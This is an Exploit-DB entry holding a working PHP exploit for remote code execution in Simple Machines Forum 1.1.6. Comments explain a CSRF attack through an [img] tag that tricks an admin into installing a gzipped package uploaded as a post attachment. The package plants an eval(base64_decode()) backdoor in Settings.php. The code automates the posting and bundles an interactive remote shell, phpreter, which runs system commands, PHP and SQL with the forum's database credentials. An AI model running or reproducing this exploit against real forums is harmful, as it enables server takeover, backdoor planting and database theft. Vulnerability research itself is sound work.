Simple Machines Forum (SMF) 1.1.6 - Code Execution

EDB-ID:

6993


Platform:

PHP

Published:

2008-11-04

<?php
#
# Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
#  Credits: Charles FOL <charlesfol[at]hotmail.fr>
#   URL: http://real.olympe-network.com/
#
# Note: other versions are maybe vulnerable, not tested.
#
# SMF suffers from multiples vulnerabilities.
# Combining some of them, we can obtain a remote code execution on the
# remote host. I won't talk here about all of them, but I'll explain
# how we can execute code.
#
# 0 - UPDATE (05/11/08)
#
# (Now,) SMF seems to replace "action=" by "action-" in every URL.
# But SMF urldecode() GET data, so I replaced "action" by "%61ction".
# Other little problems have been corrected.
#
# Thanks to Alessandro Tagliapietra for his report and his patience.
#
# It seems that many people can't use phpreter, so here is a little course :
#
# phpreter have 3 modes : cmd (bash), php, and SQL
#
# To switch to a mode just type "mode=<mode>" (replace <mode> by php, cmd or sql)
#
# In cmd mode, you can run bash commands, like "ls"
# In php mode, you can exec php code like "echo 'abc';"
# In sql mode, you can exec sql queries and view results, try "SHOW TABLES"
#
# I - Session Code
#
# SMF administration panel is secured by a "session code", a kind of
# password that must be provided by the admin browser when the admin
# is editing data.
#
# But the session code is not required for SMF package installation.
# Just to be clear : you don't need the "session code" to install the
# package, but you do need a valid admin session.
#
# II - Package Installation
#
# Package installation works this way :
# - The admin tells an archive file, which can be either gzip or zip, to SMF
# - SMF un(g)zip it, and analyse the XML files (yes, it work with XML)
#   to add, replace or remove code from any SMF source code file.
#
# To precise an archive to SMF, the admin is supposed to go on this URL :
# 
# http://[website]/SMF/index.php?action=packages;sa=install2;package=[filename] (1)
#
# Since $_REQUEST['package'] is not checked, we can install any file
# on the server, even if the file is not in the Packages/ dir.
#
# Using CSRF, we can make an admin to install whatever package we want.
# That does not seem really interesting for now, but be patient =)
#
# III - File upload in SMF; Attachments
#
# SMF let users upload files in two cases :
# - You can upload an image to be your avatar
# - You can upload attachments to every post you submit
#
# Since uploaded images are checked, they don't interest us for now.
# 
# Attachments are not checked by SMF.
# They are renamed and moved to the attachments/ directory.
# They are renamed this way :
# [id]_[name]_[ext][md5([name].[ext])]
#
# As you can see, there is no rand(), or other strange stuff :
# we can easily find attachment name.
#
# The second part is more interesting now, no ?
#
# Now, we can submit a post with a gzip'ed attachment, and make the admin
# click on a specific link, to install a package we uploaded ourself.
#
# I writed "click", so many of you may say "brr, that sucks".
# So here come the wait-I've-not-finished part.
#
# IV - Wait-I've-not-finished part
#
# SMF allows us to display remote images in our posts, using [img]<url>[/img]
# We can just set our image URL to ... (1) : when the admin will see our post,
# the package will be installed.
#
# V - Classic Scenario
#
# 1. We submit a fantastic post containing our nasty-attached-gzip'ed package, ready
#    to be installed.
# 2. We guess the attachment name, that's pretty easy because we can retrieve the
#    attachment ID.
# 3. We modify our post, adding an [img](1)[/img], replacing [filename] by 
#    ../attachments/[the_name_you_just_found]
# 4. The administrator discover our fantastic post on his fantastic forum ...
# 5. His browser discovers our image : it goes to the specified url to download it.
#    wooops. The package is installed.
#
# VI - Exploit
#
# The exploit will login with your user account, and submit a new post/topic containing an
# attachment, a gzipped package, which permits remote code execution once installed.
# Then it will obtain the attachment ID, determine attachment name, and modify your topic to
# add a remote image (using [img][/img]).
# Then you'll have to wait for an admin to see your post ... and the package will be installed.
#
# VII - Notes
#
# - Do not forget to change SUBJECT and MESSAGE constants, to make your post a little more realistic.
# - The current gzipped package is supposed to put PHP code at the end of Settings.php file.
# - Code: if(isset($_SERVER['HTTP_SHELL'])) { print 1234567890;eval(base64_decode($_SERVER['HTTP_SHELL']));print 1234567890;exit(); }
#
# First run the exploit like this :
# eg : php exploit.php -url http://localhost/forum/ -bid 2 -user tester:passwd
# And when you think the admin viewed your post, run the shell :)
# eg : php exploit.php -url http://localhost/forum/ -shell
#
# FOR EDUCATIONAL PURPOSE ONLY
#

new smf_poc();

class smf_poc
{
	const SUBJECT = 'hello';
	const MESSAGE = 'dudes ... I love your forum ;)';
	
	function smf_poc()
	{
		$this->header();
		$this->gzip();
		$this->loadparameters();
		$this->wwwinit();
		
		if(!$this->shell)
		{
			# First of all, login
			$this->login();
			# Then submit a topic
			$this->submit_post();
			# Find attachment name and message id
			$this->get_postinfo();
			# and modify the post
			$this->edit_post();
			# finally ... wait.
			$this->wait();
		}
		else
			$this->shell();
	}
	
	function header()
	{
		$this->msg();
		$this->msg('  Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit');
		$this->msg('    by Charles FOL <charlesfol[at]hotmail.fr>');
		$this->msg();
	}
	
	function msg($msg = '', $exit = 0)
	{
		print '# ' . $msg . "\n";
		
		if($exit)
		{
			$this->msg();
			exit();
		}
	}
	
	function usage()
	{
		global $argv;
		
		$name = basename($argv[0]);
		
		$this->msg('usage : php ' . $name . ' -url [url] -bid [bid] -user [user]:[passwd]');
		$this->msg('   OR   php ' . $name . ' -url [url] -shell');
		$this->msg();
		$this->msg('Parameters are :');
		$this->msg(' -shell            Test if the shell is installed, and load phpreter');
		$this->msg(' -bid (int)        The board ID were you want to submit the topic');
		$this->msg(' -user user:passwd A valid user:password couple');
		$this->msg(' -wait             Flood control time (default: 5)');
		$this->msg();
		$this->msg('eg : php ' . $name . ' -url http://localhost/forum/ -bid 2 -user tester:passwd', 1);
	}
	
	# Get every needed parameters, and load defaults
	function loadparameters()
	{
		$this->furl  = $this->getparameter('url');
		$this->shell = $this->getoption('shell');
		$this->wait  = $this->getparameter('wait', 5);
		
		if(!$this->shell)
		{
			$this->bid  = $this->getparameter('bid');
			$this->user = $this->getparameter('user');
		}
	}
	
	# Patience ...
	function wait()
	{
		$this->url->topic = $this->pid;
		$this->makeurl();
		
		$this->msg();
		$this->msg('Now, you just have to wait for an admin to see your post,');
		$this->msg('then you will be able to launch a shell using -shell.');
		$this->msg();
		$this->msg('Post URL : ' . $this->murl, 1);
	}
	
	# Check if a shell is available and launch phpreter
	function shell()
	{
		$this->www->addheader('Shell', 'MTs=');
		
		$this->url->action = 'forum';
		$this->get();
		
		if(!$this->match('(12345678901234567890)'))
			$this->msg('Shell is not available', -1);
		
		$sql = array
		(
			'var_host'   => '$db_server',
			'var_user'   => '$db_user',
			'var_passwd' => '$db_passwd',
			'var_db'     => '$db_name'
		);
		
		$preter = new phpreter($this->murl, '1234567890(.*)1234567890', 'cmd', $sql);
	}
	
	function wwwinit()
	{
		$this->www = new phpsploit();
		$this->www->cookiejar(1);
		$this->www->addheader('Referer', $this->furl . 'index.php');
	}
	
	# Log in ...
	function login()
	{
		$user = explode(':', $this->user);
		
		$this->url  = 'action=login2';
		$this->data = 'user='.$user[0].'&passwrd='.$user[1].'&cookielength=-1';
		$this->post();
		
		$this->location->action = 'login2';
		$this->location->sa     = 'check';
		
		if($this->location())
			$this->msg('Logged in as ' . $user[0]);
		else
			$this->msg('Can\'t log in', 1);
	}
	
	# Get seqnum and sescode
	function get_sessionvars()
	{
		$this->get();
		
		$this->scode = $this->match('name="sc" value="([0-9a-f]+)"', 1);
		$this->sqnum = $this->match('name="seqnum" value="([0-9]+)"', 1);
	}
	
	# Submit our post, containing our gzipped package
	function submit_post()
	{
		# Flood control: let's sleep a little
		
		$this->msg('Waiting ' . $this->wait . ' secs (flood control)');
		sleep($this->wait);
		
		# Obtain session vars
		
		$this->url->action = 'post';
		$this->url->board  = $this->bid . '.0';
		
		$this->get_sessionvars();
		
		# and submit the post
		
		$this->url->action = 'post2';
		$this->url->board  = $this->bid;
		$this->url->start  = '0';
		
		$this->data = array
		(
			'subject'            => self::SUBJECT,
			'message'            => self::MESSAGE,
			'sc'                 => $this->scode,
			'seqnum'             => $this->sqnum,
			'icon'               => 'xx',
			'topic'              => 0,
			'notify'             => 0,
			'lock'               => 0,
			'sticky'             => 0,
			'move'               => 0,
			'additional_options' => 0,
			'attachment[]'       => array
			(
				frmdt_filename => 'jpeg.jpg',
				frmdt_type     => 'image/jpeg',
				frmdt_content  => $this->GZIP,
			)
		);
		
		$this->post();
		
		# Check the submission
		
		$this->location->board = $this->bid;
		
		if($this->location())
		{
			$this->msg('Post successfully submitted');
		}
		else
		{
			$this->msg('Error while posting');
			$this->msg('Try augmenting -wait parameter', 1);
		}
		
		# Find the post id
		
		$this->url->board = $this->bid . '.0';
		$this->get();
		
		$this->pid = $this->match('topic=([0-9]+)');
		$this->pid = max($this->pid);
	}
	
	# Get the avatar ID to obtain its full name, and get msg id
	function get_postinfo()
	{
		$this->url->topic = $this->pid . '.0';
		$this->get();
		
		$this->aid = $this->match('attach=([0-9]+)', 1);
		$this->mid = $this->match('msg=([0-9]+)', 1);
		
		if($this->aid)
			$this->msg('Got attachment name =)');
		else
			$this->msg('Unable to obtain attachment ID ...', 1);
		
		if(!$this->mid)
			$this->msg('Unable to obtain message ID ...', 1);
	}
	
	# Edit our precedent post : just add our "image".
	function edit_post()
	{
		# Obtain session vars
		
		$this->url->action = 'post';
		$this->url->topic  = $this->pid;
		$this->url->msg    = $this->mid;
		$this->url->sesc   = $this->scode;
		
		$this->get_sessionvars();
		
		# Build our CSRF
		
		$this->url->{'%61ction'} = 'packages';
		$this->url->sa           = 'install2';
		$this->url->package      = $this->aid . '_jpeg_jpg' . md5('jpeg.jpg');
		$this->url->package      = '../attachments/' . $this->url->package;
		
		$this->makeurl();
		
		$img = '[img]' . $this->murl . '[/img]';
		
		# Edit the post
		
		$this->url->action = 'post2';
		$this->url->sesc   = $this->scode;
		$this->url->board  = $this->bid;
		$this->url->msg    = $this->mid;
		$this->url->start  = 0;
		
		$this->data = array
		(
			'topic'              => $this->pid,
			'subject'            => self::SUBJECT,
			'icon'               => 'xx',
			'message'            => self::MESSAGE . $img,
			'notify'             => '0',
			'lock'               => '0',
			'goback'             => '1',
			'sticky'             => '0',
			'move'               => '0',
			'attach_del[]'       => '0',
			'attach_del[]'       => $this->aid,
			'post'               => 'Save',
			'num_replies'        => '0',
			'additional_options' => '0',
			'sc'                 => $this->scode,
			'seqnum'             => $this->sqnum,
		);
		
		$this->post();
		
		if($this->location(';topic=' . $this->pid))
			$this->msg('Post successfully edited, everything done.');
		else
			$this->msg('Unable to edit the post');
	}
	
	# Find were we are redirected to
	function location()
	{
		# SMF likes making a mess with URL, so ... let's consider
		# all cases.
		
		$expr = '';
		
		$this->location = (array) $this->location;
		
		foreach($this->location as $key => $value)
		{
			$expr .= $key . '[,=]' . urlencode($value) . '(&|;|%26|%3B)';
		}
		
		$this->location = null;
		
		$expr = substr($expr, 0, -13);
		$expr = '#(Refresh|Location):.*' . $expr . '#i';
		
		$head = $this->www->getheader();

		return preg_match($expr, $head);
	}
	
	function match($expr, $one = 0)
	{
		# SMF likes making a mess with URL, so ... let's consider
		# all cases.
		
		$expr = str_replace('\?', '[\?/]', $expr);
		$expr = str_replace('=', '[,=]', $expr);
		$expr = str_replace(';', '(&|;|%26|%3B)', $expr, $count);
		$expr = '#' . $expr . '#is';
		
		$count++;
		
		$http = $this->www->getcontent();
		
		if(!$one && !preg_match_all($expr, $http, $match))
			return false;

		if($one && !preg_match($expr, $http, $match))
			return false;
		
		return $match[$count];
	}
	
	function getoption($option)
	{
		global $argv, $argc;
		
		foreach($argv as $arg)
		{
			if($arg == '-' . $option)
				return true;
		}
		
		return false;
	}
	
	function getparameter($parameter, $default = false)
	{
		global $argv, $argc;
		
		for($i=0;$i<$argc;$i++)
		{
			if($argv[$i] == '-' . $parameter)
				return $argv[$i+1];
		}
		
		if($default === false)
			$this->usage();
		
		return $default;
	}
	
	function get()
	{
		$this->makeurl();
		$this->www->get($this->murl);
	}
	
	function post()
	{
		$this->makeurl();
		
		if(is_array($this->data))
		{
			$this->data['frmdt_url'] = $this->murl;
			
			$this->www->formdata($this->data);
		}
		else
			$this->www->post($this->murl, $this->data);
	}
	
	# Construct a valid URL using the url object/string.
	function makeurl()
	{
		$url = '';
		
		if(is_object($this->url))
		{
			$url = '';
			
			$this->url = (array) $this->url;
			
			foreach($this->url as $key => $value)
			{
				$url .= $key . '=' . urlencode($value) . '&';
			}
				
			$url = substr($url, 0, -1);
		}
		else 
			$url = $this->url;
			
		$url = $this->furl . 'index.php?' . $url;
		
		$this->murl = $url;
		
		$this->url = null;
	}
	
	# Our SMF package ...
	function gzip()
	{
		$this->GZIP = ''
		. "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x0b\xed\x56\xff\x4f"
		. "\xda\x40\x14\xe7\x57\x4c\xfc\x1f\x9e\x64\x89\x98\x08\x6d"
		. "\x01\xcb\x86\xa5\xc6\x29\x8b\x26\x7e\x8b\x34\x4b\x8c\x31"
		. "\xe4\xa0\x87\xdc\x6c\xef\x9a\xde\x21\x92\x65\xff\xfb\xde"
		. "\x5d\x71\x52\xdd\x37\x12\x37\x17\xc7\xa3\x69\xb9\xbb\xf7"
		. "\x5e\xdf\xd7\xcf\x2b\xe3\x52\x91\x28\xaa\xde\xc5\x51\xe1"
		. "\x4f\x91\x63\xdb\xae\xeb\x42\xc1\x36\xf4\xf0\x84\x8c\x6a"
		. "\x8d\xad\x26\x38\x8e\x63\xd7\xeb\x76\xdd\x6d\xd6\x00\x1c"
		. "\xdb\x6d\x3a\x50\xf8\x2b\x34\x46\xff\x53\x34\x29\x15\x42"
		. "\x15\xfe\x3f\xf2\x76\x30\xf3\x70\x4b\x53\xc9\x04\x6f\x97"
		. "\x9c\xaa\x5d\xda\xf1\x57\x57\xbc\xb5\xfd\xd3\xbd\xe0\xe2"
		. "\xac\x03\xb1\x08\xd9\x90\x0d\x88\xc2\x73\xe8\x5e\x74\x83"
		. "\xce\x31\x94\x46\x4a\x25\x2d\xcb\x9a\x4c\x26\x55\xc9\xe2"
		. "\x24\xa2\x31\x19\x8c\x18\xa7\xb2\x2a\xd2\x6b\x0b\x35\x5a"
		. "\xf3\x62\x25\xa3\xb0\x52\x81\x67\xfc\xad\xae\x14\x83\x11"
		. "\x93\x80\x17\xe1\x40\xef\x88\xb6\x22\x6f\xec\x90\xe1\xce"
		. "\x50\xa4\xd0\x3d\xfe\x00\x09\x19\xdc\x90\x6b\x34\x70\x75"
		. "\x05\x45\x77\x83\xa0\x73\x12\x1c\x9e\x9e\xb4\xe0\x70\x08"
		. "\x53\x31\x06\x92\x52\x50\xe9\x94\xf1\x6b\x50\x02\x58\xd6"
		. "\x15\xa0\xf4\x2b\x62\xc2\xc7\xb8\x98\x6e\x1a\x46\x39\x12"
		. "\xe3\x28\xd4\xbc\xa8\x47\x8d\xe8\xbd\x66\xcd\x86\x8f\xb4"
		. "\x0a\x5a\x25\x53\x30\x61\xa8\x80\x0b\xfc\x23\xd2\x1b\x63"
		. "\x07\x8a\x6f\x02\x9a\x49\x24\xbe\x8b\xdc\x50\x20\x10\x09"
		. "\x71\x83\x7a\x88\x02\xad\x6a\x28\xa2\x48\x4c\xb4\x0d\x9a"
		. "\x9d\x71\xbc\xc7\x99\x2f\x78\x19\x5b\xb2\x9d\x16\x8a\x14"
		. "\x67\x39\x40\x97\xe5\xf7\x92\x10\x8a\x81\xb4\x32\xd3\x2b"
		. "\x33\x77\xaa\xc9\x28\xd1\xee\xb7\x9f\x99\x4c\x48\x8f\x1f"
		. "\x87\x5e\xc2\x00\x33\xd3\xa7\x30\x96\x34\xd4\x41\x35\xc9"
		. "\x99\xce\xce\xa4\x40\x87\x32\xb7\xa7\x10\x0a\x98\xe0\x02"
		. "\xb5\x60\x88\xd2\x6f\x11\xe5\x94\x86\x52\x73\xc4\x5a\x1c"
		. "\x99\xf0\x6e\x82\x99\xa4\x22\xa1\x69\x34\x35\xc9\x84\x67"
		. "\xad\xab\x8a\xaf\x75\x7a\xb9\x42\xc2\x7a\xe6\xb2\xbd\x68"
		. "\xd1\x67\x62\x2d\x19\x0f\x7f\x25\xaa\xfb\xa3\x68\x1a\x24"
		. "\x2b\xe9\xb9\xbc\xcf\x42\x20\x74\x1c\x75\x85\x48\x12\x63"
		. "\xd9\xc8\x2c\x76\x8c\xc3\x5c\x01\x56\xb4\x9c\xc6\xf1\x6a"
		. "\xe6\x45\xd1\x63\xa1\xdf\x27\xfd\x4f\x63\xc9\x5a\x7d\xc2"
		. "\x39\x0d\x7b\x31\x8d\xfb\xd8\xea\x3d\x72\x4b\x10\xf5\x3c"
		. "\x0b\x39\x34\xe3\xac\xfd\x7d\xbb\xea\x78\xd6\xfd\xc2\x64"
		. "\xd5\x33\x4d\xc4\xf1\xad\xed\x52\x97\x2a\x85\xb5\x29\x75"
		. "\x19\x19\x93\x8b\x9e\x4e\x83\x31\xd4\x2c\x8b\x9e\xa4\x24"
		. "\x1d\x8c\x20\x11\x92\x29\x83\x27\x94\x87\x25\xb0\x66\xa7"
		. "\x24\x0c\x7d\x6f\xed\x72\x6f\x7f\x37\xd8\xbd\x34\x5b\x6c"
		. "\x58\x66\x52\x52\x55\x7e\xd3\xeb\x76\xce\x3f\x76\xce\x2f"
		. "\xd7\x0f\x82\xe0\xac\xd7\x3d\xe8\x1c\x1d\xad\x5f\x6d\x6c"
		. "\xc0\x67\x4c\x36\xe3\x0a\x9c\x5a\xbd\xb1\xe5\x36\xdf\xbe"
		. "\xb3\xb7\xe9\x2d\x89\xca\x7d\x6c\x22\xb7\xd1\x0b\xe9\x40"
		. "\x84\xf4\x87\xe2\xdb\x4f\x85\xef\x98\x2a\x6f\x6c\xc3\x97"
		. "\xab\x2b\xdf\xb3\xb4\x45\xc6\x11\x2b\xe7\x89\x67\x69\xb7"
		. "\x35\x6a\xe5\x52\x8a\x1b\xaf\x0e\xff\x1f\x17\xcf\x0b\xcc"
		. "\x7f\x70\xdd\x7a\x36\xff\x1d\xd7\x75\xec\x06\xce\x7f\x67"
		. "\xab\xb6\x9c\xff\xff\xc6\xfc\x9f\x2f\x90\x05\xe6\xff\xbc"
		. "\x98\x99\xff\x39\x3d\xbf\x8d\xa8\x39\x35\x8b\x22\xaa\x86"
		. "\x2d\xff\xbd\x41\x3e\x98\x21\x1f\xdc\x23\x9f\x39\x5b\x08"
		. "\x24\xd5\x34\xa1\xfe\x3c\x1c\x78\x96\xd9\xfa\x09\x80\xa2"
		. "\xf6\x6c\xf2\x66\x20\x93\xc3\x12\xf6\xf0\xe1\xfd\x04\x65"
		. "\x10\x80\x1e\x04\xbd\x5c\x10\x5e\x23\x06\x2d\x69\x49\x4b"
		. "\x7a\x19\xfa\x0a\x12\x1a\xc6\x57\x00\x10\x00\x00";
	}
}

/*
 * Copyright (c) Charles FOL
 *
 * TITLE:          PHPreter
 * AUTHOR:         Charles FOL <charlesfol[at]hotmail.fr>
 * VERSION:        1.3
 * LICENSE:        GNU General Public License
 *
 */

class phpreter
{
	var $url;
	var $host;
	var $port;
	var $page;
	
	var $mode;
	
	var $ssql;
	
	var $prompt;
	var $phost;
	
	var $expr;
	var $data;
	
	/**
	 * __construct()
	 *
	 * @param url      The url of the remote shell.
	 * @param expr     The regular expression to catch cmd result.
	 * @param mode     Mode: php, sql or cmd.
	 * @param sql      An array with the file to include,
	 *                 and sql vars
	 * @param clear    Determines if clear() is called
	 *                 on startup
	 */
	function phpreter($url, $expr='^(.*)$', $mode='cmd', $sql=array(), $clear=false)
	{
		$this->url  = $url;
		$this->expr = '#' . $expr . '#is';
		
		#
		# Set data
		#
		
		$infos         = parse_url($this->url);
		$this->host    = $infos['host'];
		$this->port    = isset($infos['port']) ? $infos['port'] : 80;
		$this->page    = $infos['path'];
		
		# www.(site).com
		$host_tmp      = explode('.', $this->host);
		$this->phost   = $host_tmp[ count($host_tmp)-2 ];
		
		# Set up MySQL connection string
		$this->set_ssql($sql);
		
		# Switch to default mode
		$this->setmode($mode);
		
		#
		# Main Loop
		#

		if($clear)
			$this->clear();

		print $this->prompt;

		while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) )
		{
			# change mode
			if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i', $cmd, $array))
				$this->setmode($array[3]);
			
			# clear data
			elseif(preg_match('#^clear$#i', $cmd))
				$this->clear();
			
			# else
			else print $this->exec($cmd);
			
			print $this->prompt;
		}
	}
	
	/**
	 * set_ssql()
	 * Build $ssql var
	 */
	function set_ssql($sql)
	{
		$this->ssql = '';
		
		$sql = (object) $sql;
		
		# is there something to include ?
		
		if(isset($sql->include))
			$this->ssql .= 'include(\'' . $sql->include . '\');';
			
		# mysql_connect: host, user, passwd
			
		$this->ssql .= 'mysql_connect(';
		
		foreach(array('host', 'user', 'passwd') as $key)
		{
			if(isset($sql->{'var_' . $key}))
			{
				$this->ssql .= $sql->{'var_' . $key} . ',';
			}
			else
			{
				$this->ssql .= "'" . $sql->{$key} . "',";
			}
		}
		
		$this->ssql  = substr($this->ssql, 0, -1);
		$this->ssql .= ');';
		
		# mysql_select_db
		
		if(isset($sql->var_db))
			$this->ssql .= 'mysql_select_db(' . $sql->var_db . ');';
		elseif(isset($sql->db))
			$this->ssql .= 'mysql_select_db(\'' . $sql->db . '\');';
			
		# basic display for mysql results
		
		$this->ssql .= '$s=str_repeat(\'-\',50)."\n";';
		$this->ssql .= '$q=mysql_query(\'<CMD>\') or print($s.mysql_error()."\n");';
		$this->ssql .= 'print $s;';
		$this->ssql .= 'if($q)';
		$this->ssql .= '{';
		$this->ssql .=     'while($r=mysql_fetch_array($q,MYSQL_ASSOC))';
		$this->ssql .=     '{';
		$this->ssql .=         'foreach($r as $k=>$v) print " ".$k.str_repeat(\' \', 20-strlen($k))."| $v\n";';
		$this->ssql .=         'print $s;';
		$this->ssql .=     '}';
		$this->ssql .= '}';
	}
	
	/**
	 * clear()
	 * Clear ouput, printing "\n"x50
	 */
	function clear()
	{
		print str_repeat("\n", 50);
		return 0;
	}
	
	/**
	 * setmode()
	 * Set mode (PHP, CMD, SQL)
	 */
	function setmode($newmode)
	{
		$this->mode   = strtolower($newmode);
		$this->prompt = '['.$this->phost.']['.$this->mode.']# ';
		
		switch($this->mode)
		{
			case 'cmd':
				$this->data = 'system(\'<CMD>\');';
				break;
			case 'php':
				$this->data = '';
				break;
			case 'sql':
				$this->data = $this->ssql;
				break;
		}
		
		return $this->mode;
	}

	/**
	 * exec()
	 * Execute any query and catch the result.
	 */
	function exec($cmd)
	{
		if($this->data != '')
			$shell = str_replace('<CMD>', addslashes($cmd), $this->data);
		else
			$shell = $cmd;

		$shell = base64_encode($shell);
		
		$packet  = "GET " . $this->page . " HTTP/1.1\r\n";
		$packet .= "Host: " . $this->host . ( $this->port != 80 ? ':' . $this->port : '' ) . "\r\n";
		$packet .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n";
		$packet .= "Shell: $shell\r\n";
		$packet .= "Connection: close\r\n\r\n";
		
		$fp = fsockopen($this->host, $this->port, $errno, $errstr, 30);
		
		fputs($fp, $packet);
		
		$recv = '';
		
		while(!feof($fp))
			$recv .= fgets($fp, 128);
		
		fclose($fp);
		
		# Remove headers
		$data    = explode("\r\n\r\n", $recv);
		$headers = array_shift($data);
		$content = implode("\r\n\r\n", $data);
		
		# Unchunk content
		if(preg_match("#Transfer-Encoding:.*chunked#i", $headers))
			$content = $this->unchunk($content);
		
		# Find results
		preg_match($this->expr, $content, $match);
		
		$match = $match[1];
		
		# Add a \n if there is not
		if(substr($match, -1) != "\n")
			$match .= "\n";
		
		return $match;
	}
	
	/**
	 * unchunk()
	 * Remove chunked content's sizes which are put by the apache
	 * server when it uses chunked transfert-encoding.
	 */
	function unchunk($data)
	{
		$dsize  = 1;
		$offset = 0;
		
		while($dsize>0)
		{
			$hsize_size = strpos($data, "\r\n", $offset) - $offset;
			
			$dsize = hexdec(substr($data, $offset, $hsize_size));
			
			# Remove $hsize\r\n from $data
			$data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) );
			
			$offset += $dsize;
			
			# Remove the \r\n before the next $hsize
			$data = substr($data, 0, $offset) . substr($data, ($offset+2) );
		}
		
		return $data;
	}
}

/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.0
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this->recv ServerResponse
	 * 
	 */
	function sock()
	{
		if(!empty($this->proxyhost) && !empty($this->proxyport))
		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
		else
		   $socket = @fsockopen($this->host,$this->port);
		
		if(!$socket)
		   die("Error: Host seems down");
		
		if($this->method=='get')
		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
		   
		elseif($this->method=='post' or $this->method=='formdata')
		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		if(!empty($this->proxyuser))
		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
		
		if(!empty($this->header))
		   $this->packet .= $this->showheader();
		   
		if(!empty($this->cookie))
		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
	
		$this->packet .= 'Host: '.$this->host."\r\n";
		$this->packet .= "Connection: Close\r\n";
		
		if($this->method=='post')
		{
			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data."\r\n";
		}
		elseif($this->method=='formdata')
		{
			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data;
		}

		$this->packet .= "\r\n";
		$this->recv = '';

		fputs($socket,$this->packet);

		while(!feof($socket))
		   $this->recv .= fgets($socket);

		fclose($socket);

		if($this->cookiejar)
		   $this->getcookie();

		if($this->allowredirection)
		   return $this->getredirection();
		else
		   return $this->recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this->addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		if(!isset($this->cookie))
		   $this->cookie = array();

		$this->cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this->addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		if(!isset($this->header))
		   $this->header = array();
		   
		$this->header[$headern] = $headervalue;
	}


	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this->proxy('localhost',8118)
	 * @example $this->proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		if(empty($proxyp))
		{
			$proxarr = explode(':',$proxy);
			$this->proxyhost = $proxarr[0];
			$this->proxyport = (int)$proxarr[1];
		}
		else 
		{
			$this->proxyhost = $proxy;
			$this->proxyport = (int)$proxyp;
		}

		if($this->proxyport > 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this->proxyauth('user','pwd')
	 * @example $this->proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		if(empty($proxypass))
		{
			$posvirg = strpos($proxyauth,':');
